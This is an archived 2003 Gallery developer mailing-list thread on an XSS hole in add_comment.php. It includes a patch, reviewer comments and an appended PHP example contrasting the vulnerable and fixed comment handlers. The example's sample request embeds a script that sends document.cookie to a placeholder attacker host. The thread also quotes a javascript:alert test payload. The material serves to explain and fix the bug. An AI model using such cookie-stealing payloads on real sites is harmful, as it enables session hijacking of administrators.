From: Andrew L. <joy...@ya...> - 2003-01-29 12:43:55
Also, just wondering, are you going to ship 1.3.4 because of this or just wait until all the new features are stable (i.e. the normal release cycle)? If you wanted, you could make this a patch release, considering the patch needed was 2 lines, unless there are other features that you would like in 1.3.4.

--Andrew

--- Andrew Lindeman <joy...@ya...> wrote:
> Sounds good :)
>
> --Andrew
>
> --- Bharat Mediratta <bh...@me...> wrote:
> >
> > Ok, I had some spare time so I added this in 1.3.4-cvs-b10 along with some other stuff I've had kicking about in my dev tree for a little while.
> >
> > As a further measure, I also run removeTags() on any IP addresses when they are displayed, so that we'll be protected against malicious data that might have been entered with an older version of the code.
> >
> > -Bharat
> >
> > From: "Andrew Lindeman" <joy...@ya...>
> > ...
> > > Eeek. Glad I caught that. Thanks to Delfim for realizing it was more than what I was suggesting. Here's my full patch (available here too: http://pictures.troop350.org/gallery/add_comment.txt ).
> > >
> > > --Andrew
> > >
> > > --- add_comment.php.orig 2003-01-28 21:27:14.000000000 -0600
> > > +++ add_comment.php 2003-01-28 21:27:48.000000000 -0600
> > > @@ -41,7 +41,7 @@
> > > if ($commenter_name && $comment_text) {
> > > $comment_text = removeTags($comment_text);
> > > $commenter_name = removeTags($commenter_name);
> > > - $gallery->album->addComment($index, stripslashes($comment_text), $IPNumber, $commenter_name);
> > > + $gallery->album->addComment($index, stripslashes($comment_text), $HTTP_SERVER_VARS['REMOTE_ADDR'], $commenter_name);
> > > $gallery->album->save();
> > > dismissAndReload();
> > > return;
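Review bot: the filtering order at the top of this hunk runs removeTags() before stripslashes(), so the tag filter inspects the still-escaped string while the unescaped result is what gets stored; depending on what removeTags() matches, a backslash placed inside a tag could slip past the filter and be turned back into a plain tag by stripslashes(). Unescape first and filter second, e.g. `$comment_text = removeTags(stripslashes($comment_text));`, and treat `$commenter_name` the same way, since it is currently passed to addComment() without stripslashes() at all, so the two fields are handled inconsistently. The switch from `$IPNumber` to `$HTTP_SERVER_VARS['REMOTE_ADDR']` is the right fix: `$IPNumber` was a register_globals variable populated from the client's own hidden field, whereas REMOTE_ADDR is set by the web server from the connection and cannot be supplied in the POST body.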
> > > @@ -74,7 +74,6 @@
> > >
> > > <?php echo makeFormIntro("add_comment.php", array("name" => "theform", "method" => "POST")); ?>
> > > <input type=hidden name="index" value="<?php echo $index ?>">
> > > -<input type=hidden name="IPNumber" value="<?php echo $HTTP_SERVER_VARS['REMOTE_ADDR'] ?>">
> > > <table border=0 cellpadding=5>
> > > <tr>
> > > <td>Name or email:</td>
> > >
> > > --- Bharat Mediratta <bh...@me...> wrote:
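Review bot: the context line just above the removed input echoes `$index` into the hidden field's value attribute unescaped (`value="<?php echo $index ?>"`); the first hunk shows `$index` being posted back and passed to addComment(), so if it originates from the request this is the same class of problem the patch fixes for IPNumber, and it should be cast (`(int) $index`) or wrapped in htmlspecialchars() before being echoed. Dropping the IPNumber field is correct, but under register_globals a client can still send `IPNumber=...` and have `$IPNumber` defined; that is harmless only as long as nothing else in add_comment.php reads it, which is worth grepping for before this ships.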
> > > > From: "John Kirkland" <jp...@bl...>
> > > >
> > > > > When I wrote add_comment.php, I didn't have the removeTags call. Bharat added that later as a security fix.
> > > > >
> > > > > I'm trying to get my arms around the XSS thing so I can stop writing code with the problem! Since javascript is client-executed, is that truly XSS? I thought XSS was when you got the server to execute code.
> > > >
> > > > XSS occurs when you blindly take client-side input and display it on the browser without filtering out potentially damaging JavaScript commands. This particular XSS hole could be exploited by somebody submitting an add_comment post with something like this in it:
> > > >
> > > > javascript:alert('hi')
> > > >
> > > > Then when the admin goes to view the comment, his browser will run the script. The above example will just print out a message, but a more sophisticated one could mail the admin's session cookie to a malicious user or do something worse. This is bad.
> > > >
> > > > Beckett, can you move this patch to the top of the list? Once this is in we should cut a new rev of Gallery with this fix and ship it.
> > > >
> > > > Thanks,
> > > > -Bharat
> > >
> > > __________________________________________________
> > > Do you Yahoo!?
> > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> > > http://mailplus.yahoo.com
> __[ g a l l e r y - d e v e l ]_________________________
>
> [ list info/archive --> http://gallery.sf.net/lists.php ]
> [ gallery info/FAQ/download --> http://gallery.sf.net ]
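The hole discussed in this thread, shown as an added example that is not Gallery's code and was not posted by anyone on the list: a comment handler that trusts a hidden IPNumber form field, beside one that takes the address from the server-populated REMOTE_ADDR and escapes every stored field on display. The function names, the in-memory comment store, the sample request and the hostname attacker.invalid are all made up for the example; Gallery's removeTags() is not reproduced, htmlspecialchars() stands in for it, and modern PHP (5.4 or later, for ENT_HTML5) is assumed rather than the PHP 4 of the original patch.

```php
<?php
// Added example, not Gallery's code. It reproduces the bug behind the
// add_comment.php patch in this thread and the two-part fix: take the
// address from the server, not the form, and escape every stored field on
// display. Everything here (function names, the in-memory store, the sample
// request, attacker.invalid) is constructed for the example.

// Vulnerable: the "IP" is whatever the client put in the hidden IPNumber
// field, which under register_globals became the $IPNumber variable that
// the old addComment() call stored.
function addCommentVulnerable(array &$store, array $post)
{
    $store[] = array(
        'name' => $post['commenter_name'],
        'text' => $post['comment_text'],
        'ip'   => $post['IPNumber'],            // attacker-controlled
    );
}

// Fixed: the address comes from the connection the web server accepted
// ($_SERVER['REMOTE_ADDR'], PHP 4's $HTTP_SERVER_VARS['REMOTE_ADDR']) and is
// validated before it is stored.
function addCommentFixed(array &$store, array $post, array $server)
{
    $ip = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        $ip = 'unknown';
    }
    $store[] = array(
        'name' => $post['commenter_name'],
        'text' => $post['comment_text'],
        'ip'   => $ip,
    );
}

// HTML-escape for a text node or a double-quoted attribute value.
function esc($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The pre-fix display: name and text are filtered (Gallery used
// removeTags(); htmlspecialchars() stands in for it here), the IP is not.
function renderCommentOld(array $c)
{
    return sprintf('<p><b>%s</b> (%s): %s</p>', esc($c['name']), $c['ip'], esc($c['text']));
}

// Post-fix display: every field is escaped, including the IP, so records
// written by an older, unpatched version are rendered harmlessly too.
function renderComment(array $c)
{
    return sprintf('<p><b>%s</b> (%s): %s</p>', esc($c['name']), esc($c['ip']), esc($c['text']));
}

// Constructed sample request: the hidden field carries a cookie-stealing
// script instead of an address.
$post = array(
    'commenter_name' => 'someone',
    'comment_text'   => 'nice photo',
    'IPNumber'       => "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>",
);
$server = array('REMOTE_ADDR' => '198.51.100.23');

$store = array();
addCommentVulnerable($store, $post);
addCommentFixed($store, $post, $server);

// The first rendered line (old display path, record written by the
// vulnerable handler) still contains the raw <script> tag; the rest are safe.
echo "Old renderer, record written by the vulnerable handler:\n";
echo renderCommentOld($store[0]), "\n\n";
echo "Fixed renderer, both records:\n";
foreach ($store as $c) {
    echo renderComment($c), "\n";
}
```

Run it with `php example.php` and compare the first output line with the others: the old renderer emits the attacker's script verbatim, which is exactly what an admin's browser would execute when viewing the comment, while the escaped renderer neutralises both the freshly stored record and the one written by the vulnerable handler. One caveat the thread does not mention: behind a reverse proxy REMOTE_ADDR is the proxy's address, and the usual workaround, reading X-Forwarded-For, puts a client-controlled header back into the same position the hidden field occupied, so it must be escaped on output and accepted only from trusted proxies.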